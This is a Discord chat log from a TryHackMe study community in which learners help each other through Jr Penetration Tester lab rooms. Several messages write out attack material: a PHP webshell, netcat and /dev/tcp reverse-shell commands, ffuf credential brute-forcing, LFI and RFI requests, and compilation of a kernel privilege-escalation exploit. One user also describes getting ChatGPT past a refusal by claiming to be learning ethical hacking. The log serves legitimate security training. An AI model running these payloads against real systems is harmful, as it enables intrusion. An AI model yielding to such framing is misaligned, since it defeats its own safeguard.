Attackers can exploit API endpoints that are vulnerable to broken object-level authorization by manipulating the ID of an object that is sent within the request.

Per OWASP

Are you recommending this: https://portswigger.net/web-security ?

Yes

Good content, all free too

So in particular, it's an ID
The example in the video was a property of the ticket object, rather than the ID

guys I need little guidance,
i am currently on the verge of completing jr pentester path and I'm trying my hands on various machines on try hackme. with some help I'm able to root easy and medium machines.
my question is at this level what should I do ?root more machines or try the offensive pen testing path? thank you

@modest arch There are a few options you can consider. Rooting more machines will continue to strengthen your technical skills and deepen your understanding of different vulnerabilities and attack vectors. This hands-on experience is invaluable and will contribute to your growth as a pentester.
Alternatively, exploring the Offensive Pen Testing path could be an excellent next step. This path focuses on simulating real-world engagements and will provide you with a broader perspective on various offensive techniques, tools, and methodologies. It can be a great opportunity to further enhance your skill set and gain exposure to different scenarios. Ultimately, the decision depends on your personal goals and interests. You could also mix and match, alternating between rooting machines and exploring the Offensive Pen Testing path to diversify your knowledge and skills.

Remember, the key is to continue challenging yourself, learning new techniques, and staying up-to-date with the latest developments in the field. Feel free to reach out if you have any more questions or need further guidance along the way.

+rep @torpid juniper

Gave +1 Rep to @torpid juniper

room: file inclusion
task: 5
question: 1
path given is /var/www/html/lab3.php, meaning to exit we should have to use 3 ../
however, the solution requires 4 ../
am I missunderstanding smt or is the answer in the wrong format?

Hi I need help with the following
room: What the Shell?
task 13
I have uploaded a php webshell on the webpage and i have used the command nc -lvnp 1234 to set up listner. Later I have also navigated to the following URL: http://<machine IP>/uploads/websh.php?cmd=nc%20<Attack box IP>%201234%20-e%20/bin/bash

I am not receiving the reverse shell. The php code is:
<?php
if(isset($_GET[‘cmd’])) {
system($_GET[‘cmd’]);
}
?>

guys can someone help with the Authentication Bypass task 4

sure, what's the problem?

So first i understand Fuff and it's simple syntax but after we started using some complex syntaxes i don't even understand and then i moved to logic flaw i have no clue what is going on hahah

it's pretty well explained in the text

what exactly are you having problems with?

THey haven't created an account.

huh

weird

also how do you know?

they have account-related roles

Because they've posted in a different channel and I'm currently helping them.

oh

lmao

alrighty then

@hard vortex -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/signup -mr "username already exists"

why do we use the -X POST

because it's a parameter for the command

but why

it says in the text before

-X POST is the header

yeah i know because the default is GET

so the server knows we're sending data

but what does it do

ahhh okey

it sets the header?

GET = get data
POST = give data

-d "username=FUZZ&email=x&password=x&cpassword=x"

can you explain this one

well -d is the parameter for the data we're inputting to the website

FUZZ (as also explained in the text) is the word from the file you also gave in the command

it iterates through the file and inputs every word

yeah so we can replace it from the names list

yeah

and password we just set to x

bc rn we don't care about it

yeah

and what's cpassword

I think it's the "repeat password" thing

if you're interested in the command look up the github

they have a pretty good docs

do you have a link ?

just google the name of the tool

• github

ok bro thank you so much

also i think there's a link whenever you use the command

np, gl!

boop!

have a nice day

u2

Getting started again on the path. How far is everyone? Working on the Burp Suite section.

Well, I ended up completing the Burp Suite and Network Security sections. Made it about half way through Vulnerability Research section. Need to slow down and read more.

I've got two rooms left on the Burp section, personally I'm trying not to rush so I can try and absorb the knowledge, some sections I have blitzed through though but I guess if you're going fast you already know the stuff

Why does Burp intercept Google.com when I have defined the scope?
If anyone can help, thanks.

And it still logs google in search history

Ok, google disappears if I change the filter.

But I still have the issue that I cannot use my browser for anything while Burp intercept is on. Can I set the scope correctly so browser url if out of scope can still be used without interception?

I've worked on Burp in the past. I have a networking background its definitely helped.

just now arriving at burp content

my background is in software engineering so I definitely know my way around a computer and have got basic networking experience but Burp is completely new to me, seems like a crazy powerful tool and I'm having way too much fun using it

I'm used to being on the opposite side of a pen test, fixing vulns not exploiting them

i used it for some of the earlier stuff in the path, it's pretty great

Hi please I dmed you.

with your background I'm sure it helps with finding vulns.

Hi, I need help with the Linux privilege escalation room. Task 5

I am trying to send an exploit file to target machine using python3 http server and download it on target using wget. When I try this I get permission denied error as shown below. I have also tried modifying file permissions but it does not seem to work.

do you have write permission into the folder you are trying to wget the file into???

if you are unsure a good tip is to go for the /tmp folder

Error:

Ofs.c : Permission Denied
Cannot write to ofs.c

Yes I have the permission

It worked with the /tmp folder

Thanks

Why is the attack box really slow

Please help me (Task 3 of Authentication Bypass of Jr. Pentester-path) in Attack-box - can't find valid username and password. I have tried everything possible but couldn't find anything.

Very happy that I just finished the Net Sec Challenge room without much help besides looking up a tiny thing.
The only problem I had was ||waiting for a hydra scan to finish where I did a typo of / instead of : as the separator for the port for the ftp server and the scan happily went on anyways||

What is "everything possible"?

It seems that it's only trying the passwords for 1 username, hence the Progress: [XX/100]

I mean Many people had the problem in the same Task 3 before, so I tried everything as shown in past messages of this group.

yes, so where could be the problem?

It would indicate your valid_usernames.txt isn't saved with the proper content

Having created the file with vim, I could finish the Task again with no problems at least

Thankyou, the problem is I was doing editing directly in the valid_usernames.txt file, as you suggest to do with Vim, its work.

#room-help message

I'm in the Linux Privesc room, attempting the Cron Jobs section.
I've overwritten backup.sh with
||```bash
$ echo "#!/bin/bash

bash -i >& /dev/tcp/10.10.161.63/1234 0>&1" > backup.sh```||
And started a netcat listener on port 1234 on the Kali VM, and I'm not getting any connection from the other system. Is the script wrong, or should I just wait a little longer? I've been waiting about 5 minutes.

Did you check the permissions of your backup.sh ?

Read write only for root, read for rest

So, there you have the issue

chmod +x?

Ah got it thanks

nice you figured it out

what does the two blank lines at the bottom of the request for ?

well to indicate there is no more data being sent

like we must let 2 blank line at the bottom to indicate that this the end of our request ?

yuup exactly

Just finished the vulnerability capstone room. Gotta say, being tired made this last so much longer than it needed to.
|| At some point, after having tried multiple github PoCs (working or not I don't know I might just be too stupid)) I tried doing it with the one given in the hint, which - funnily enough - was also one of the Github ones. After the nice advice of the script and setting up a listener I still received weird errors when trying to use it. Took me like 30 minutes to figure out not to write python3 exploit.py http://IP_ADRESS which I think was required (the http://) for some of the exploits I found that didn't seem to work. ||

nice that you got through it... hope your struggles help your learning

I hope so as well

What I took from this is that either my knowledge is still severely lacking in certain regards, or the documentation might just be insufficient for some of these exploits 🙂

more on the later end

hence having basic reading of python knowledge helps

Oh, definitely

I got scared seeing exploits in other languages 😄

I will definitely be revisiting everything at some point, but for now there's "only" the last two modules left for this path

hey can anyone help me

What's up?

I am getting this in the Attack Terminal

root@ip-10-10-47-88:~# telnet 10.10.120.80 80
Trying 10.10.120.80...
telnet: Unable to connect to remote host: Connection timed out
root@ip-10-10-47-88:~# telnet 10.10.120.80 80
Trying 10.10.120.80...
telnet: Unable to connect to remote host: Connection timed out

Not this

entester@tiny bluff$ telnet 10.10.120.80 80
Trying 10.10.120.80...
Connected to MACHINE_IP.
Escape character is '^]'.
GET / HTTP/1.1
host: telnet

Active Recon: Telnet

I can cannect ok.

Are you using attackbox?

Yes

is there any chances that I am getting this because I don't have subscription

Not at all.

Can I DM you to share the ss

what exactly is it your trying to do? which module are you on?

Connect to telnet?

!docs verify

If you follow the screenshot, you can verify

Active Reconnaissance

Learn how to use simple tools such as traceroute, ping, telnet, and a web browser to gather information.

It's ok, I know what you're doing.

ok so your using attack box... maybe try terminating the machine and restarting it back in task 3?

Ok trying

On your VM, can you type ip a s ?

sudo killall openvpn -9

Then reconnect once.

ok doing

That should reconnect you to the VPN once, and only have tun0

I guess still not working

Are you doing it on a VM or Attackbox now?

ping is also not working

You just pinged google.co

sorry

Are you in a VM or attackbox?

using both

Just use one.

is your kali vm connection

the openvpn?

ovpn?

yup

Ok trying

ip a s on KALI

Ok now its working

thanks

awesome!

new problem😢

thanks @remote iris

Gave +1 Rep to @remote iris

This part can be annoying.

hey how to give reputation

please help

type: "thanks @ <insert name>

thanks @remote iris

just need to be quick.

Gave +1 Rep to @remote iris

ok

the task your on i just did it... well if im thinking its the one

the telnet one

task 5 was it?

in Active Recon?

thanks it works

yes

you all good now yeah?

i literally finished the pathway to JR Pen last night around midnight it was a lot to take in but im happy to see the green check mark and moving on now

hey so you have subscription

yeah for sure.

is it worth?

absolutely

One more thing

theres a lot of content for free of course but having the sub is very nice imo

How much time it take after i pay through debit card

plus im down to support a company thats teaching me my dreams

instant.

instant^

ok

Because I was thinking ..... but I read some comments and I got confused

yeah its instant.

Hey one more question where I can see ctf

you can go right to the learn tab

go into the search section

and under the "Type" bar select CTF

There are 3 room

theres like 9 pages or more...?

where

yes^

Ok

Learn>Search>Type

😄

thanks

thanks @wooden temple

Gave +1 Rep to @wooden temple

any time i can help im happy!

im still pretty new myself. happy hunting and ask away. theres always some one here to help

Hi

Hey everyone!

Finally finished the path today. It felt great completing the path. That's 3 for me now.

Based on Shodan.io, what is the 3rd most common port used for nginx? I doesn't find correct answer for this. Can anyone help

Which room are you on?

Ah, I got it.

Are you still stuck?

If so, just go to shodan.io and search NGINX in the box.

I tried all those. But it is responding as incorrect.
May be i think the 3rd most port may be changed after days. But it hasn't changed in the answer section. I think so

I just done it, and the third most used port matches my answer.

May I know the port number

How about, you verify and screenshot what you're doing.

!docs verify

Thank you, I got

I miss spelled nginx

Gave +1 Rep to @remote iris

should i redo the entire fundamentals again if i struggle to do the challenge part of file inclusion?

Only the privilege escalation module left for me, finally doing something about this graph 🙂

Anyone else having trouble accessing Jr Penetration Tester?

Everytime I click on it, it redirects me to /paths

yes see #site-bugs

Should work now. Can you please retry? 🙂

Works!! 🔥

sry, wrong IP

let me try again

Gave +1 Rep to @fair hill

when i try to upload the pentestermonkey php reverse shell form my own kali linux machine the page keeps loading no matter what the room or the challenge is but it works on the attack box, does anyone have an idea what the problem with my machine might be?

Are you on the VPN?

yes

finished intro and pre paths, just starting on junior pentest, excited to go through this path

anyone else had trouble with the automated discovery part of content discovery? my attack box doesnt seem to have the wordlists installed so the commands wont work

Sounds strange, maybe different path? Try to find rockyou.txt on attack box.

like @tranquil citrus said... find the .txt on your attack box. the commands list the path that is loaded on kali by default. not the ubuntu your attack box runs on (unless you selected kali)

File Inclusion - Remote File Inclusion - RFI

I can't inject the malicious URL (http:// attacker.thm/cmd.txt)
into the playground URL (10.10.x.x/playground.php?file=)

I guess it's supposed to show me a page that's saying "Hello THM" but it doesn't

Any ideas?

is attacker.thm replaced with your ip address as doubt that is a domain the target machine knows about

Yes i tried that too, it says File content preview of http:// {my ip} /cmd.txt
NOT FOUND

I should be able to view that file in my browser right?

If i type http:// {my ip} /cmd.txt

I think i see the problem now

My Active Machine information is showing a different IP Address than my AttackBox IP

Im not sure why

http://10.10.x.x:8000/cmd.txt
if you are running a python web server normally

I didn't have to use a Port before, maybe because im using the Attack box

I got it, when the assignment is telling you to visit a website like http:// MACHINE_IP /cmd.txt, it's because it somehow didn't notice that you connected to a VM

Once it realizes that you did connect to a VM, the "MACHINE_IP" gets replaced with your actual IP

So sometimes my assignment thinks Im not connected yet 😕

you should most of the time need to use the port unless you are specifing port 80 in the command to run the web server

Is there a easy way to see / echo out the $_REQUEST superglobals of a website?

when i try to upload the pentestermonkey php reverse shell form my own kali linux machine the page keeps loading no matter what the room or the challenge is but it works on the attack box, does anyone have an idea what the problem with my machine might be?
ps: i connect using VPN

Do you have a listener set up?

Yes everything is done right

I can upload anything
But the pentestermonkey i cant
So i tried through the attack box and it worked perfectly

Can anyone tell me how to login by intercepting email address on burp suite rather than user name. Every time I tried on original websites for practice it didn't work

Uh...

which websites?

@idle bison still around?

wat

Intercepting with burp doesn't care about the content.
What are you trying to do?

I was just trying to login just to practice it's been three days I started burp suite.

me again, im finding the local file inclusion task confusing, wondering if anyone can point me in a direction to understand it better? stuck on 2nd question and got the answer to 1st in my own way not the way thm explains to you. ive re read the info about 10 times and still cant figure it out

I’m working through the File Inclusion task too. I’m right now on the challenges and I spent a couples hours on it the other day. What I have been doing is trying it a couple ways. Take a break or depending on my time try again the next day and if I don’t get something read a walk through. But I’m finding this section one of the more challenging so far

Hi All, I am working on the Linux Privilege Escalation Room Task 9 (Cron Jobs). can someone help me understand this please. The text says ' we can see backup.sh is running every minute'

I can only see * * * * * in the screenshot does that mean if there is no number on the frequency then it's one minute by default or something else ?

`# = ID
m = Minute
h = Hour
dom = Day of the month
mon = Month
dow = Day of the week
user = What user the command will run as
command = What command should be run

For Example,

m h dom mon dow user command

17 * 1 * * * root cd / && run-parts --report /etc/cron.hourly`

As far as I am aware this is the notation ?

Appreciate all inputs.

All asterisk means frequency of one minute. Checked.

||i was stuck on this for hours last night. Its all about the cookie, you only need to change the cookie. Try inputing something else and see what it says||

I'm doing the Exploit Vulnerability web server book store module. Can someone point in the right direction?

||I've found the open SSH port and there also appears to be an SQL vulnerability but I can't seem to find the right method of query the SQLDB to enumerate its columns and data bases||

This just helped me, thanks! 🙂

Gave +1 Rep to @sage current

no problem and good to see someone learn of the most commonly world writeable dir on linux and with a slight change windows

Hey, I had a problem yesterday with ffuf on trybackme, it was checking my list, 10 thousand examples, but I do not know how to distinguish the correct hits in the result of the program.

You can apply filters to ffuf, e.g. filtering on status codes, words, size, etc.

But to me fuff just checks where the designation is, which are correct e.g. Names, suggest what in the result ?

Maybe you want to share a screenshot so that I better understand what you want to achive

You would have to verify first in order to send screenshots in here

!docs verify

Okay, i will share at home.

Okay, nevermind, today they worked, dont know how, but they working correctly.

Hello, I used a video to pass this task because I did not understand, I still do not understand can you explain what I did please?

Simply put, you automated the task of manually trying each and every word in the wordlist to discover hidden files and directories in your target.

OK, thank you for your reply, but I don't understand the command. Is it important to know?

Gave +1 Rep to @prisma raptor

the commands largely work the same, you specify a wordlist with -w (or positionally in the case of dirb), you specify the IP (or url of the website) with the -u or --url flag, the tool then iterates through the wordlist by sending requests to the website and observing the responses that it gets back to find existing directories. In the case of ffuf, you use FUZZ to specify where the iterating has to occur.

ok thanks, I understand better

Gave +1 Rep to @zealous dew

you're welcome 🙂

Just one last question, I've done several rooms (30), but there are things that I understand but that I forget or that are still a blur, is that normal? I need to reread every day ? or with practice every day I don't need to (I do as many learning rooms as possible so I can practice with ctf afterwards).

My advice is to take notes on every room, there's an enormous amount of information, we can't remember it all, you'll get used to the commands and tools you use frequently for sure, but you need to have a way to refer back to things you've seen before but haven't used much. If it's a learning room, write things down in your own words, note down commands. If it's a challenge, take screenshots and write down how you solved it.

That's what I do, I use notion but since I don't know what to take, I copy all the pages x) to put them back on notion.

great, you can try to re-write things in your own words to be sure you understand them, I don't know how Notion's search function is, being able to search your notes can be very useful

Yes, for example, if I'm in training and don't know how a tool works, or if I'm looking for something specific, I can do a search and find my notes.

after I'm still young experience will come with time

of course, things will clear up with time

Yes, and I haven't studied "computer science" yet. Thanks to tryhackme + studies, I'll be able to better understand and assimilate the things I'm being taught

Gave +1 Rep to @zealous dew

Just keep at it and you'll learn a ton

Nice

I am using obsidian

hello I have a doubt in SSRF

<input type="radio" name="avatar" value="assets/avatars/1.png">

in the above line when i change value

<input type="radio" name="avatar" value="a/../private">

it works

but when i do
<input type="radio" name="avatar" value="/../private">

gives an error why?

You're trying to move up a directory from /

Ye but I didn't understood the significance of a if it's not present i got the error

a can be replaced with any other chars execpt special chars

I take back what I said this is confusing me now as well.
cd /../home would put me in the /home directory. Interesting that /../private doesn't get /private for the web app

Is home in the same directory as private, or is private in home?

I would assume not

By using /../private it raises an error

I don't understand how by adding a/../private works

/../private looks for a private inside the root directory. But that is not where it is

this shit hard bruh lol

i might be missing something but does anybody not use attack box and just use your native browser. Ive done openvpn and started the machine but when i put the machine ip address in my chrome browser, it times out

http://{ip}/private
Is the location of directory so i guess it is in root of web

Do you check the machine is serving on port 80?

Are you on the VPN?

Hello, the room on File Inclusion is complicated to understand I find, is it something basic complicated to understand or I'm just stupid?

If something is complicated for you, you can try to google (or ask ChatGPT nowadays) for easier explanations. If you struggle still, you can also ask people about specific questions you might have.
Whether something is complicated or not is mostly a subjective matter. Just because you find it hard to understand something, does not make you stupid.

Don't be too hard on yourself as you are still learning anyway. If everything was too easy, this field won't be as interesting. What's important is you have the drive to learn and the patience that needs to go with it.

The problem with this room is that there's a challenge, but unfortunately you have to guess the result of the challenge. Let me explain, I have to help myself to a video, because we have to use software we've never used before - the room never taught me that this tool existed, so maybe I forgot to learn something or other, but it still seems strange to me (I'd like to point out that I did all the rooms in order). As for the rest of the room, no problem.

Bro

I was doing that room just now

and legit just opened discord to ask the same shit

even the videos people are using burp suite and its tough

MY question is that why do we have to use the null byte at the end of the url

why can't we just add .php at the end

?

I asked chatgpt and it said this:
Modifying cookies without proper authorization is not ethical and may be illegal. As an AI language model, I must prioritize user safety and follow ethical guidelines. I cannot assist you in performing actions that could violate the privacy and security of websites or users.

If you are the owner of the website or have proper authorization to modify the cookie values, you can do so through the server-side code of your website. However, if you are attempting to modify cookies on a website that you do not own or have permission to access, I strongly advise against it.
If you have any legitimate reasons for modifying cookies or if you have questions about web development, security, or programming, feel free to ask, and I'd be happy to help within ethical boundaries.

then i told it that im learning ethical hacking and need to kow how to do it

and it gave me the answer

;-;

Ah yes, that is a thing.

I also remember some rooms that seemed to require tools I learned later on, so you guys aren't alone :)

okay ty man

Gave +1 Rep to @real shard

any other useful resources that might help?

i wanna give me ejpt in the next few months

It may be a problem in the room

yeah i think so too

You ever look up the answer for a question and just sit there like…”I didn’t even see those words in the article” that’s been my whole day lol

I’m in file inclusion

I did not understand can you formulate it another way, ( I am french sorry)

What he meant was that he is so lost on the file inclusion room that he can't even find help

xD

yes I think the problem comes from the room it should be reported to the staff

I don't think the room has a problem. Most of the issue I had was with the challenge part

Yeah the room is harder than all the ones before it

but still

Yes the challenge sorry

I mean its called a challenge for a reason ig

i got till the third task

and then got stuck

infact for people like us it is even impossible without video

yeah you could say that

but its okay even with a video

as long as ur learning

i left the challenge portion for later

ill finish it after i learn burp suite

yes but the goal is not to do it with a video but only from his brain

I too will make another room tomorrow

good luck bro

What I'd recommend you two do, because you'll need it sooner or later, is doing the "Practice"-Series for Pentesting Tools which introduces the important ones.

I'm really glad I joined the THM Discord today and read these last few messages!

I have been doing the JrPP too and have been completely stuck on the File Inclusion challenges. I can't even get past the first one - the change from Get to Post. When I've looked it up online everyone is saying to use Burp Suite or curl command (neither of which I've used yet or have really been covered in the Learning Paths I've completed - Introduction to Cyber Security and Pre Security) but I've been assuming that there must be a way of completing the challenge using the Web Developer Tools in my browser, as per the JrPP so far. Of course, I could have completely misunderstood and it is possible to do using the Web Developer Tools...😬 .

I've now started the Complete Beginner path (which was hidden for some reason) to try to learn more before going back to JrPP File Inclusion challenges at a later date.

You mean the changing cookie challenge? I mean the first one you click on inspect page and go to storage. You'll find the cookie shown there and change the value of the cookie from user to admin and refresh

Can you provide the link for it?

https://tryhackme.com/hacktivities?tab=practice
Under Series > Pentesting Tools

thank you

Gave +1 Rep to @real shard

Hi - thanks for the reply. It's the Task 8 (challenges) and capture Flag 1 where the site is broken and can only accept Post requests instead of Get requests (I hope I'm explaining this correctly, I'm still getting used to doing this)

Gave +1 Rep to @velvet bane

ooh

yeah you have to use curl for it

I'll try to see if i can find the exact link for it

coz i dont remember

For any kind of command on Linux, like curl, there is a great command that goes like man [command] .

Or just the normal --help

Both of those will tell you in detail how to use the command

Thanks for that, that's great!

Thank you so much for the help, it's very much appreciated!

curl -X POST http://machineip/challenges/chall1.php -d 'method=GET&file=/etc/flag1'

just run this in the terminal

https://www.youtube.com/watch?v=bMnuXZ70YdU

also use this video

for help

but i recommend coming back to the challenge later

and doing it yourself

that's what im gonna do too

this will give you the first flagf

Amazing, thank you both for the help. I think the main thing I was worried about was that I had completely misunderstood the path so far and was just being really dumb! Thank you for the links, will definately do them and come back to the challenges later and try again 🙂

Nah it's fine dw about it . Yw

has anyone done the xss scripting room?

i keep waiting for the request to come through on netcat

but it never does

Just a tip, pinned in #room-help :

What Room? (Link, Room title, room code from URL)
What Task? (Give the number!)
What question? (Number, maybe also basic details)
What have you tried?
What happened?
What didn't happen?
What did you expect to happen?
A picture paints a thousand words. Don't type a thousand words. Screenshots are awesome. Photos of your screen are not.
(If you want to paint a picture, we'll be impressed but a screenshot is really better)

Are you doing this on the Attackbox or a VM?

Regarding the Privilege Escalation: Cron tabs task for the Linux PrivEsc room:
I read the crontab file and edited the .sh file that is in the users' home folder the same way it was shown in the description of the task (with my attackbox IP and port 4444)
Then I started the listener on port 4444 on the attackbox but so far nothing's been happening.

I understood from somebody's question some days ago that * for cron jobs is the default value of 1, so it should run every minute

Is this the backup.sh ?

yes

Did you make it an executable?

Ohhh I need to do that, okay.
Do you know if the file was executable before? I was assuming if there is a cron job for an existing file it would be executable already

You can check manually?

I will, thanks for the tip :)

Hello. For the Vulnerability Capstone, was anyone able to exploit the machine using Fuel CMS 1.4.1 - Remote Code Execution (3)?

https://tryhackme.com/room/xss this room
task 8 the one with the practical example
theres only one question so
I tried it on the attackbox and waited for a while but it didnt work.
Ill attach a ss though do wait

attackbox

this is the screenshot

Try to see what's wrong with this: https://{www.google.com}

I already checked google

on forums someone else had an issue too

nonono

ontryhackme

it went unsolved

look at the link I posted

how does the link on your browser look compared to it

if you go on google

im confused. You want me to enter the link on the attackbox?

I don't want to make it too obvious
https://www.google.com vs https://{www.google.com}

What's the difference

the brackets ofc

Exactly 🙂

oh

i think i got it

oh shit

ty man

npnp :)

i didnt realise the issue would be that dumb 😭

thats like missing a semi colon

It often is yeah

thanks alot

Gave +1 Rep to @real shard

Like me earlier missing that a file needs to be executable in order to be executed

yeah LOL

Oh boy, only Windows PrivEsc left to complete the path

did you ever find an answer to this? I'm currently stuck here

did you try running the command again?

for me it worked after i ran the command 2-3 times

this is assuming the command you ran is correct

I solved it. Had the wrong IP therefore I was getting the wrong size value to for filter.

Hi. I'm on the Walking An Application. Task 5 Developer Tools - Debugger. I already click the breakpoint then refresh the page. It only says "Paused on breakpoint" it doesnt give the flag in the red box 😦

did u click the correct breakpoint?

also guys im on task 11 of burp suite basics https://tryhackme.com/room/burpsuitebasics and it asks me to connect to the machine on the built in burp browser

when i enter the ip it shows on the intercept output but the site never loads

same for when i do it on the external broswer

you need to either turn intercept off or hit to forward button

for the room the later is probably the intended way

oh right

ty

no problem

I can't seem to paste a screenshot here in discord.

Yes, I believe so..
Debugger > click on flash.min.js > then on the code on the right, have click it and had a blue mark. on the right side it says Paused on breakpoint. Checking the Firefox, it has a refresh and play button that say "Pause on breakpoint". I tried both buttons, but no flags..

have figure it out, have to click the Pretty Print option so that i can select just the flash code, thanks for getting back to me 🙂

Gave +1 Rep to @velvet bane

verify yourself

using the bot

then you can post pics and stuff

dm the bot with !verify

@tiny bluffthis bot

much appreciated, its now working 🙂

hello, I have a question.
In nmap live host discovery, task 3, there's something which I don't really understand, the subnet target specification comamnd.

subnet: MACHINE_IP/30 will scan 4 IP addresses.

I don't really understand how this command works, I know what subnets are but, I just don't get it. (I am following the free tryhackme training guide for context)

a screenshot of the task in question would be useful

my bad, sorry

i think u need to

look up subnets and understand it better

but to summarize

it will scan 4 address as it will scan ip/0, ip/1, ip/2 and ip/3

i hope u get it now

when you do 15-20 it then scans 6 addresses because 15,16,17,18,19,20

stuck at after completing some topics

they demand subscription

but i am not able enough to subscribe because i am student at universit

any alternative

There is raffle competitions now and then.

goood morning

hi everyone my name is Bendking

I need a help from anyone who is willing to do

I'm new student and I'm having some challenges in some of the questions

What is the flag that you obtained by following along? pls be of help if you know this and how I can go about it thanks in advance

What room are you having a challenge or difficulty on specifically? If you can add a link to it, that will be helpful so we can better understand the issue you are having.

@prisma raptor Intro to Defensive Security

Task 2

https://tryhackme.com/r/resources/blog/free_path
Also, there is a student discount I believe. The normal learning paths on the site are, as advertised, for subscription users.

feeling kind of great as gaining some practical knowledge, after spending ridiculous amount of money on the university just to study the basic theories for years

im having an issue with nmap not showing open port 6667, ive used -p- and still nothing, ive scanned the port by itself which returns open. Whats causing this to not respond sudo nmap -sS 10.10.89.133 is the command ? cheers

hmm the port is closed, over looked it

hi I'm getting this error when running

gcc 37292.c -o ofc

37292.c:106:12: warning: implicit declaration of function ‘unshare’ [-Wimplicit-function-declaration]
  106 |         if(unshare(CLONE_NEWUSER) != 0)
      |            ^~~~~~~
37292.c:111:17: warning: implicit declaration of function ‘clone’; did you mean ‘close’? [-Wimplicit-function-declaration]
  111 |                 clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
      |                 ^~~~~
      |                 close
37292.c:117:13: warning: implicit declaration of function ‘waitpid’ [-Wimplicit-function-declaration]
  117 |             waitpid(pid, &status, 0);
      |             ^~~~~~~
37292.c:127:5: warning: implicit declaration of function ‘wait’ [-Wimplicit-function-declaration]
  127 |     wait(NULL);
      |     ^~~~```

so i ignored this in the beginnig but later in the target machine in did this to me

./ofc

./ofc: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./ofc)```

so what should i do

Please put code and similar things, like the message above, in something like this ``` abcdef ```

ok

It's multiline and if it's for code you can even tell it the language after the first 3 ```

print("Hello World!")

python example

What task are you on?

task 5

There are a lot of task 5's out there :)
It'll be easier to help you in general if you describe issues in this way:

What Room? (Link, Room title, room code from URL)
What Task? (Give the number!)
What question? (Number, maybe also basic details)
What have you tried?
What happened?
What didn't happen?
What did you expect to happen?
A picture paints a thousand words. Don't type a thousand words. Screenshots are awesome. Photos of your screen are not.
(If you want to paint a picture, we'll be impressed but a screenshot is really better) ``` - James in [#room-help](/guild/521382216299839518/channel/522158539129618453/)

oh oh

sorry

i forgot to say I'm in linux privsec

I though i said that

room : linux priv sec
task 5
q 2

oh I remember I struggled with that for a bit as well. Lemme get into it again

what happened

Try compiling it on the target machine and not the attacker machine

wait ok

i got it

but i think there is no priv to do it in target machine

See this 🙂

Had exactly the same problem as you

ok

no i passed that

i'm getting error when running the compiled code

Did you use wget to get the .c file or the one you compiled on the attackbox

I'll try to compile on target as you old me and see if it words

the compiled one

Yeah that won't work

ok

I'll try

Something to do with the compilation needing the targeted kernel available I assume

yes your assumption is right

thanks for helping

and sorry if I wasted your time

No problem, glad to help :)

I'm almost done with the path, can anyone suggest ctfs that I can practice the skills I'm learning? Most of the ones I've tried are way above my skill level

you could always specify a search for "Easy" CTF's and try those ones out. i have noticed taking the skills over to the offensive pentest pathway is pretty intense

theres a whole bunch and most of them have a description on what exactly the box is

Thank you

hi , i have been stuck at the Authentication bypass room task 3for two days now, i have done all the instructions and read online but i didnt get the results like everyone else. Note i made the " valid_usernames" file in the same dir when running the command, and also tried html format but also got an unreadable result.

here is the command : " ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d “username=W1&password=W2” -H “Content-Type: application/x-www-form-urlencoded” -u http://IP/customers/login -fc 200 "

Your cmd is right

try terminating and restarting the machine

Idemon I had a same problem ,at the end I found my fault. The directory valid_usernames comes from task 2, user name enum results but ı had't found a folder like that in my kali .So , I compose a new file and copied already found(from task 2 like robert,steve ...) usernames into this file and changed my valid_username with my new folder in ffuf and got the name and password pair.

I was assuming you guys were on attackbox

I have made a file where copied the names only to the valid_results, and didn’t get any result + i tried to output the results with -o file.txt but what i got is a bunch of unreadable codes. Maybe I didn’t understand your point, can pls elaborate? Thanks

Gave +1 Rep to @fiery gazelle

Yes i am using attack box on a premium sub

Do you guys think I should do it with my local kali vim ?

after you created your new folder Did you changed your command like ::: " ffuf -w YOUR_NEW_CREATED_FOLDERBYHAND:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d “username=W1&password=W2” -H “Content-Type: application/x-www-form-urlencoded” -u http://ip/customers/login -fc 200 "

Yes 😅💔 i am really confused i tried everything, but surely something must be wrong.

I am also got stuck on the Authentication machine task 4 :logic flaw :I tried whatever I can but didnt find the way for support flag .Is there any help to me on the process ?

What exactly do you need help with?

there are two curl command and even if I tried very much times I couldnt reach the flags ,could you summerise the mission please ?

do you have a picture and the task?

kali vm is wheres its at 😎

thank you anyway,I solved it👍

Gave +1 Rep to @fringe dirge

Hello, I'm hoping someone can help me as i keep reading over this one room over and over again and I'm just not getting it. I'm working through the junior pentester path in Introduction to Web Hacking in the Server Side Request Forgery (https://tryhackme.com/room/ssrfqi) on Task 2 SSRF Examples. When looking through the examples I'm on the 4th example out of 5. This is showing the expected request and what the hacker requests. I just don't understand/confused on when using a "&x=" what is happening here. Is api.website.thm returning user123 or is it returning all of the user information? I just keep reading this over and over again and it's like I'm slamming my head against the wall with the wording here. I feel lost on this one. Any help would be great!

A picture would be nice

cant paste a screenshot in for some reason

You would need to verify your account to do so.

!docs verify

well the &x= at the end of the url is to make it stop parsing it as a link to another place

server side request forgery is basically tricking the website which has access to the server backend to send a request to said backend by the user provding the link to said backend

@prisma raptor thank you for the information just verified. @velvet bane here is what I was refereing to.

Gave +1 Rep to @prisma raptor

are you familiar with programming in c++ and strings in said language???

because if you are the &x= is like a null terminator

So in the screenshow that I linked. wouldn't be sending any inforformation after ?x=

it signfies end of input to the url for the backend

null terminator is familiar concept i think it was covered in another lesson

yuup exactly

okay so the hacker in this case is basicaly just asking for the information in /api/user and anything after the null statement, in this case it's the &x=, is ignored. It just throws me off the hacker is asking for more then what they want, I'm guessing there's a reason to this. Maybe the website is expecting this kind of format.. is ?x= also a null statment?

it is not exactly a null statement but it acts as the end of input from the hacker and try and ignore everything after this point

kinda like the -- - in sql injection too

Okay I'm not sure what I was getting tripped up on but i'll just tell myself to ignore everything after &x= and the hacker just wants everything in /user in this case. Im not sure why they would be requesting any information after that but i'll just put that on the back burner.

Thanks @sage current for trying to help me out here!

Gave +1 Rep to @sage current

yeah shadow had trouble understanding ssrf at first too

it is kinda weird

web stuff is killing my brain lol. It's very cool but a foreign concept to me

Same here!

think of having something at the end your payload you want to ignore, by using &x= you modify the paylod in a way everything that comes after your defined query will be set as an additional parameter and by that ignored

